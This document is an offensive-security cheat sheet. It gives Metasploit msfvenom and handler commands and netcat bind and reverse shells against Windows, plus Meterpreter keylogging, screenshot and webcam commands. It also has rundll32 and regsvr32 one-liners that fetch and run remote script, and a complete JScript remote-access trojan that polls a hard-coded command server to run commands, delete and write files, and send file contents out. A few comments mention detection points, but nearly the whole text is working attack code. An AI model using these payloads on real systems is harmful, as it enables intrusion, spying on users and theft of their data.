Metasploit Framework
Bind Shell
msfvenom -p windows/meterpreter/bind_tcp -f exe > bindshell.exe
|
Get the victim to download and execute the file (the payload then listens locally on its bind port and waits for the attacker to connect).
|
Ensure the victim has already executed the bind shell before running the handler below — with bind_tcp the handler is the connecting side, so there must be a listener to reach.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.66.101
exploit
|
The attacker (192.168.66.102) initiates the connection to the victim machine (192.168.66.101, the RHOST above) on port 4444. Caveat: a bind shell listens without any authentication, so any host that can reach that port can take the session, and the open port is trivially visible to a port scan.
Bind Shell using Netcat
Victim
nc -lvp 8099 -e cmd.exe
(`-e` is only available in netcat builds that support program execution, e.g. ncat or nc.traditional; the OpenBSD netcat shipped on many Linux systems does not have it.)
Attacker
nc -vn <victim_ip_address> 8099
Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.66.102 -f exe > reverseshell.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.66.102
exploit
|
The victim (192.168.66.1) initiates the connection to the attacker machine (192.168.66.102, the LHOST above) on port 4444, the default LPORT — set LPORT on both the msfvenom command and the handler if a different port is needed, and keep them consistent.
Reverse Shell using Netcat
Victim
nc -vn <attacker_ip_address> 8099 -e cmd.exe
Attacker
nc -lvp 8099
Post-exploitation using Meterpreter (run inside the established session)
sysinfo
screenshot
webcam_snap
keyscan_start
keyscan_dump
keyscan_stop
Malware Propagation
Browser - Virus Found!
Reverse Shell using JavaScript (JScript fetched and launched through the rundll32 / regsvr32 living-off-the-land binaries below)
Send HTTP request with rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.56.102:8088/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Send HTTP request with regsvr32
regsvr32.exe /u /n /s /i:http://192.168.56.102:8088/file.sct scrobj.dll
JScript returned in the HTTP response (the body served for the /connect request above, which the rundll32 one-liner passes to eval; the regsvr32 variant expects the same logic wrapped in a .sct scriptlet)
// JScript (Windows Script Host / ActiveX) command-and-control loop.
// This is the body the HTTP server returns to the rundll32 / regsvr32
// one-liners above, which hand it to eval(). It polls
// http://192.168.56.102:80/rat synchronously and forever and treats each
// response body as a command word. Plain http, no authentication, no
// integrity check on the commands, and a hard-coded C2 address: each of
// these is a blocking / detection point for defenders (the
// "WinHttp.WinHttpRequest.5.1" + "Scripting.FileSystemObject" +
// "WScript.Shell" ActiveX trio created from a rundll32/regsvr32 host
// process is itself a strong signal). Kept as an attacker sample for
// study; deliberately not "fixed" or hardened here.
while (true) {
    // A fresh WinHttpRequest per poll. The four zero timeouts are
    // (resolve, connect, send, receive); presumably intended to disable
    // them so a long poll never throws -- confirm against WinHttp docs.
    h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    h.SetTimeouts(0, 0, 0, 0);
    try {
        // Synchronous GET (third argument false); the whole response body
        // is the command word.
        h.Open("GET", "http://192.168.56.102:80/rat", false);
        h.Send();
        c = h.ResponseText;
        // Exact string compare: any stray whitespace or newline in the
        // server reply misses every keyword below and the text is handed
        // to Exec() in the final else branch instead.
        if (c == "delete") {
            // Acknowledge, then fetch the target path with a second GET.
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to Delete]");
            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;
            // The path comes straight from the network; no validation.
            // GetFile throws if it does not exist, landing in catch below.
            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.GetFile(d);
            f.Delete();
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Delete Success]\n");
            continue;
        } else if (c == "download") {
            // "download" from the operator's point of view: exfiltrate a
            // file from the victim. Same ack-then-fetch-path handshake.
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to download]");
            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;
            // OpenTextFile mode 1 = ForReading; this is a text-mode read,
            // so binary files would not survive the round trip intact.
            // Note `g` is reused: first the request object, then the
            // file contents.
            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.OpenTextFile(d, 1);
            g = f.ReadAll();
            f.Close();
            // Contents go to a separate /download endpoint, not /rat.
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/download", false);
            p.Send(g);
            continue;
        } else if (c == "read") {
            // Same as "download" except the contents are posted back to
            // /rat with a trailing newline (meant for on-screen display).
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to Read]");
            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;
            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.OpenTextFile(d, 1);
            g = f.ReadAll();
            f.Close();
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send(g + "\n");
            continue;
        } else if (c == "run") {
            // Execute an arbitrary command line supplied by the C2.
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Next Input should be the File to Run]");
            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/rat", false);
            g.Send();
            d = g.ResponseText;
            // WScript.Shell.Run(command, windowStyle, waitOnReturn):
            // window style 0 hides the window, true blocks until the
            // process exits, so a long-running command stalls the poll
            // loop. Output is not captured (unlike the Exec branch).
            r = new ActiveXObject("WScript.Shell").Run(d, 0, true);
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Run Success]\n");
            continue;
        } else if (c == "upload") {
            // Write an operator-supplied file onto the victim. Destination
            // path and contents come from two dedicated endpoints.
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Start to Upload]");
            g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g.SetTimeouts(0, 0, 0, 0);
            g.Open("GET", "http://192.168.56.102:80/uploadpath", false);
            g.Send();
            dpath = g.ResponseText;
            g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            g2.SetTimeouts(0, 0, 0, 0);
            g2.Open("GET", "http://192.168.56.102:80/uploaddata", false);
            g2.Send();
            ddata = g2.ResponseText;
            // CreateTextFile(path, true) overwrites an existing file
            // silently; text mode again, and WriteLine appends a newline
            // to whatever was received.
            fso1 = new ActiveXObject("Scripting.FileSystemObject");
            f = fso1.CreateTextFile(dpath, true);
            f.WriteLine(ddata);
            f.Close();
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.SetTimeouts(0, 0, 0, 0);
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send("[Upload Success]\n");
            continue;
        } else {
            // Anything that is not a keyword is run as a shell command via
            // Exec, and its stdout is reported back.
            r = new ActiveXObject("WScript.Shell").Exec(c);
            var so;
            // ReadAll consumes the stream to its end, so this loop runs at
            // most once; if the command prints nothing, `so` stays
            // undefined and "undefined\n" is what gets posted. Stderr is
            // never read.
            while (!r.StdOut.AtEndOfStream) {
                so = r.StdOut.ReadAll()
            }
            // Unlike every other branch, no SetTimeouts call here.
            p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
            p.Open("POST", "http://192.168.56.102:80/rat", false);
            p.Send(so + "\n");
        }
    } catch (e1) {
        // Any failure (network, missing file, bad path, Exec error) is
        // reported with a single generic message; the loop then continues.
        // If the C2 itself is unreachable this POST throws too, which is
        // swallowed by the script host and the loop simply spins.
        p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        p.SetTimeouts(0, 0, 0, 0);
        p.Open("POST", "http://192.168.56.102:80/rat", false);
        p.Send("[ERROR - No Output]\n");
    }
}